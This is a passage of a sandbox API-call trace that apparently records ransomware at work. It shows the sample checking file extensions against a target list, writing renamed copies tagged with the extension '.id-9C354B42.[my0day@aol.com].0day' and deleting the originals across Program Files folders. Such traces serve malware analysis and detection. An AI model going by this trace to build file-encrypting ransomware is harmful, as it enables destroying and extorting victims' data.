-1 [0047.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.596] lstrlenW (lpString=".1cd") returned 4 [0047.596] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74 [0047.596] lstrlenW (lpString=".jpg") returned 4 [0047.596] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.596] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0047.596] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.596] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.597] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1571) returned 1 [0047.597] CloseHandle (hObject=0x16c) returned 1 [0047.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 0x20 [0047.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.597] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.597] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0047.599] GetLastError () returned 0x0 [0047.599] ReadFile (in: hFile=0x16c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x623, lpOverlapped=0x0) returned 1 [0047.602] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x630, lpOverlapped=0x0) returned 1 [0047.603] ReadFile (in: hFile=0x16c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.603] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.603] SetEndOfFile (hFile=0x1d8) returned 1 [0047.603] CloseHandle (hObject=0x1d8) returned 1 [0047.603] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.603] SetEndOfFile (hFile=0x16c) returned 1 [0047.604] CloseHandle (hObject=0x16c) returned 1 [0047.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.604] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 1 [0047.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.604] lstrlenW (lpString=".doc") returned 4 [0047.604] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.604] lstrlenW (lpString=".docx") returned 5 [0047.604] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.604] lstrlenW (lpString=".pdf") returned 4 [0047.604] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.604] lstrlenW (lpString=".xls") returned 4 [0047.605] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.605] lstrlenW (lpString=".xlsx") returned 5 [0047.605] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.605] lstrlenW (lpString=".ppt") returned 4 [0047.605] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.605] lstrlenW (lpString=".zip") returned 4 [0047.605] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.605] lstrlenW (lpString=".rar") returned 4 [0047.605] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.605] lstrlenW (lpString=".bz2") returned 4 [0047.605] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.605] lstrlenW (lpString=".7z") returned 3 [0047.605] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.605] lstrlenW (lpString=".dbf") returned 4 [0047.605] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.605] lstrlenW (lpString=".1cd") returned 4 [0047.605] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.605] lstrlenW (lpString=".jpg") returned 4 [0047.605] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.605] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.605] lstrlenW (lpString=".doc") returned 4 [0047.605] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.605] lstrlenW (lpString=".docx") returned 5 [0047.605] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.605] lstrlenW (lpString=".pdf") returned 4 [0047.605] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.605] lstrlenW (lpString=".xls") returned 4 [0047.605] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.605] lstrlenW (lpString=".xlsx") returned 5 [0047.606] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.606] lstrlenW (lpString=".ppt") returned 4 [0047.606] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.606] lstrlenW (lpString=".zip") returned 4 [0047.606] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.606] lstrlenW (lpString=".rar") returned 4 [0047.606] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.606] lstrlenW (lpString=".bz2") returned 4 [0047.606] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.606] lstrlenW (lpString=".7z") returned 3 [0047.606] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.606] lstrlenW (lpString=".dbf") returned 4 [0047.606] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.606] lstrlenW (lpString=".1cd") returned 4 [0047.606] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0047.606] lstrlenW (lpString=".jpg") returned 4 [0047.606] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.793] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=30170) returned 1 [0047.793] CloseHandle (hObject=0x22c) returned 1 [0047.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 0x20 [0047.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0047.793] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.793] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0047.794] GetLastError () returned 0x0 [0047.794] ReadFile (in: hFile=0x22c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x75da, lpOverlapped=0x0) returned 1 [0047.839] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x75e0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x75e0, lpOverlapped=0x0) returned 1 [0047.840] ReadFile (in: hFile=0x22c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.840] WriteFile (in: hFile=0x230, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.840] SetEndOfFile (hFile=0x230) returned 1 [0047.840] CloseHandle (hObject=0x230) returned 1 [0047.841] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.841] SetEndOfFile (hFile=0x22c) returned 1 [0047.842] CloseHandle (hObject=0x22c) returned 1 [0047.842] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.842] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 1 [0047.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0047.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0047.842] lstrlenW (lpString=".doc") returned 4 [0047.842] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.842] lstrlenW (lpString=".docx") returned 5 [0047.842] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.842] lstrlenW (lpString=".pdf") returned 4 [0047.842] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.842] lstrlenW (lpString=".xls") returned 4 [0047.842] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.842] lstrlenW (lpString=".xlsx") returned 5 [0047.843] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.843] lstrlenW (lpString=".ppt") returned 4 [0047.843] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0047.843] lstrlenW (lpString=".zip") returned 4 [0047.843] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.843] lstrlenW (lpString=".rar") returned 4 [0047.843] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.843] lstrlenW (lpString=".bz2") returned 4 [0047.843] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.843] lstrlenW (lpString=".7z") returned 3 [0047.843] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0047.843] lstrlenW (lpString=".dbf") returned 4 [0047.843] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0047.843] lstrlenW (lpString=".1cd") returned 4 [0047.843] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0047.843] lstrlenW (lpString=".jpg") returned 4 [0047.843] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.867] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.886] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.886] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0048.607] GetLastError () returned 0x0 [0048.607] ReadFile (in: hFile=0x22c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xe6b62, lpOverlapped=0x0) returned 1 [0048.625] WriteFile (in: hFile=0x224, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6b70, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6b70, lpOverlapped=0x0) returned 1 [0048.643] ReadFile (in: hFile=0x22c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.643] WriteFile (in: hFile=0x224, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.643] SetEndOfFile (hFile=0x224) returned 1 [0048.643] CloseHandle (hObject=0x224) returned 1 [0048.643] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.643] SetEndOfFile (hFile=0x22c) returned 1 [0048.650] CloseHandle (hObject=0x22c) returned 1 [0048.651] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0048.651] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm")) returned 1 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0048.651] lstrlenW (lpString=".doc") returned 4 [0048.651] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0048.651] lstrlenW (lpString=".docx") returned 5 [0048.651] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0048.651] lstrlenW (lpString=".pdf") returned 4 [0048.651] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0048.651] lstrlenW (lpString=".xls") returned 4 [0048.651] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0048.651] lstrlenW (lpString=".xlsx") returned 5 [0048.651] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0048.651] lstrlenW (lpString=".ppt") returned 4 [0048.651] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0048.651] lstrlenW (lpString=".zip") returned 4 [0048.651] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0048.651] lstrlenW (lpString=".rar") returned 4 [0048.652] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0048.652] lstrlenW (lpString=".bz2") returned 4 [0048.652] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0048.652] lstrlenW (lpString=".7z") returned 3 [0048.652] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0048.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0048.652] lstrlenW (lpString=".dbf") returned 4 [0048.652] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0048.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0048.652] lstrlenW (lpString=".1cd") returned 4 [0048.652] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0048.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 70 [0048.652] lstrlenW (lpString=".jpg") returned 4 [0048.652] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0051.079] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.079] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0051.079] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0051.079] lstrlenW (lpString=".doc") returned 4 [0051.079] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.079] lstrlenW (lpString=".docx") returned 5 [0051.079] lstrcmpiW (lpString1=".docx", lpString2="e.wmv") returned -1 [0051.079] lstrlenW (lpString=".pdf") returned 4 [0051.079] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.079] lstrlenW (lpString=".xls") returned 4 [0051.079] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.079] lstrlenW (lpString=".xlsx") returned 5 [0051.079] lstrcmpiW (lpString1=".xlsx", lpString2="e.wmv") returned -1 [0051.079] lstrlenW (lpString=".ppt") returned 4 [0051.079] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.079] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0051.079] lstrlenW (lpString=".zip") returned 4 [0051.079] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.079] lstrlenW (lpString=".rar") returned 4 [0051.079] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.079] lstrlenW (lpString=".bz2") returned 4 [0051.079] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.079] lstrlenW (lpString=".7z") returned 3 [0051.079] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.079] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0051.080] lstrlenW (lpString=".dbf") returned 4 [0051.080] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.080] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0051.080] lstrlenW (lpString=".1cd") returned 4 [0051.080] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.080] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0051.080] lstrlenW (lpString=".jpg") returned 4 [0051.080] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.080] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0051.080] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0051.080] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0051.080] lstrlenW (lpString=".doc") returned 4 [0051.080] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.080] lstrlenW (lpString=".docx") returned 5 [0051.080] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.080] lstrlenW (lpString=".pdf") returned 4 [0051.080] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.080] lstrlenW (lpString=".xls") returned 4 [0051.080] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.080] lstrlenW (lpString=".xlsx") returned 5 [0051.080] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.080] lstrlenW (lpString=".ppt") returned 4 [0051.080] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.080] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0051.080] lstrlenW (lpString=".zip") returned 4 [0051.081] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.081] lstrlenW (lpString=".rar") returned 4 [0051.081] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.081] lstrlenW (lpString=".bz2") returned 4 [0051.081] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.081] lstrlenW (lpString=".7z") returned 3 [0051.081] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.081] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0051.081] lstrlenW (lpString=".dbf") returned 4 [0051.081] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.081] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0051.081] lstrlenW (lpString=".1cd") returned 4 [0051.081] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.081] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0051.081] lstrlenW (lpString=".jpg") returned 4 [0051.081] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.822] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.822] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 